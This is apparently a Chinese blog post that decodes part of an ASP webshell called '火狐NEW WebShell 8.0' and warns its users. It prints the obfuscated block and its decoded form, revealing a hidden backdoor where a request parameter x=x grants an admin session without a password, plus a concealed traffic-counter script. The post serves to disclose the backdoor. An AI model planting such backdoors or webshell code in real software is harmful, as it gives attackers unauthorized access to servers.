
用解密软件可以很容易的把《火狐NEW WebShell 8.0》中99%的代码解密出来,但其中还是有一段代码是加密的琳ZWpcVbfVdexriry.rirpeYV_琳pDVddZ`_xrhVS#R#U^Z_ryp.pFdVcARdd琳pppppppFC=xy琳ppV_UpZW琳琳:WpDVddZ`_xrhVS#R#U^Z_ryp-/pFdVcARddpEYV_琳pp:WpCVbfVde~7`c^xrARddryp-/prrpEYV_琳pppp:WpCVbfVde~7`c^xrARddryp.pFdVcARddpEYV_琳ppppppDVddZ`_xrhVS#R#U^Z_ryp.pFdVcARdd琳ppppppCVda`_dV~CVUZcVTepFC=琳pppp6]dV琳 pcVda`_dV~hcZeVrp验证p失败p!r琳pppp6_Up:W琳pp琳pp6]dV琳ppppD:.r-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/p-Sc/p火狐?6HpHVSDYV]]p)~!p-Sc/p-Sc/r琳ppppD:.D:vr-W`c^pRTeZ`_.wrvFC=vrwp^VeY`U.wa`dew/r琳ppppD:.D:vrp密码:-Z_afep_R^V.wARddwpejaV.waRddh`cUwpdZkV.w""&w/r琳ppppD:.D:vrpv_Sda,p-Z_afepejaV.wdfS^ZewpgR]fV.w登录w/p- W`c^/p- TV_eVc/r琳pppppCVda`_dV~HcZeVpD:琳pppppCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/每一天睜開眼睛ヽo妳和陽光都在→那就是ωǒ要的菋來-Sc/r琳 pCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/本人到此只是技术上的研究。鄙视搞破坏的-Sc/r琳 pCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/ -Sc/r琳pppppCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/3J+神魂颠倒じ☆-Sc/r琳pppppcVda`_dV~hcZeVr-daR_pdej]V.UZda]Rj+_`_V/-dTcZaep]R_XfRXV.rr[RgRdTcZaerrpdcT.rrYeea+ T`f_e#%~&""jVd~T`^ T]ZT\~Rdai0ZU.#%$((*&$'v]`X`.""rr/- dTcZae/- dTcZae/- daR_/r琳pp6_Up:W琳ppCVda`_dV~6_U琳6_Up:W琳
不过只要你稍懂些Asp分析下它附近已解密出来的代码,要把上面这段代码也解密出来其实也很简单。解密后[code]if request(“x”)=”x” then
Session(“web2a2dmin”) = UserPass
URL()
end if
If Session(“web2a2dmin”) <> UserPass Then
If Request.Form(“Pass”) <> “” Then
If Request.Form(“Pass”) = UserPass Then
Session(“web2a2dmin”) = UserPass
Response.Redirect URL
Else
response.write” 验证 失败 !”
End If
Else
SI=”
火狐NEW WebShell 8.0
”
SI=SI&”
Response.Write SI
Response.Write”
每一天睜開眼睛ヽ~妳和陽光都在→那就是ωǒ要的菋來
”
Response.Write”
本人到此只是技术上的研究。鄙视搞破坏的
”
Response.Write”
”
Response.Write”
BY:神魂颠倒じ☆
”
response.write””
End If
Response.End
End If[/code]
看到了吧,代码里面隐藏着一个后门[code]if request(“x”)=”x” then
Session(“web2a2dmin”) = UserPass
URL()
end if[/code]和一个流量统计代码
,加这些代码的人还真不厚道,目前网上流传的版本中很多都有这个后门,使用《火狐NEW WebShell 8.0》的可要小心了。免责声明:
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长,并提供相应的资质证明,我们将于3个工作日内予以删除!
2. 本站不保证所提供下载的资源的准确性、安全性和完整性,资源仅供下载学习之用!如果喜欢,请你购买正版,享受售后服务!
3. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!如用于商业或者非法用途,与本站无关,一切后果请用户自负!
4. 如有链接无法下载、失效或广告,请联系客服处理,有奖励!
5. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
我的盒子|觅盒 » 解密《火狐NEW WebShell 8.0》后门代码
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 提示下载完但解压或打开不了?
- 找不到素材资源介绍文章里的示例图片?
- 联系站长
这个后门难道web2a2dmin这个是万能密码么?
不像啊 只是多了个流量统计??
呵呵 原来这个后门已经有人发现了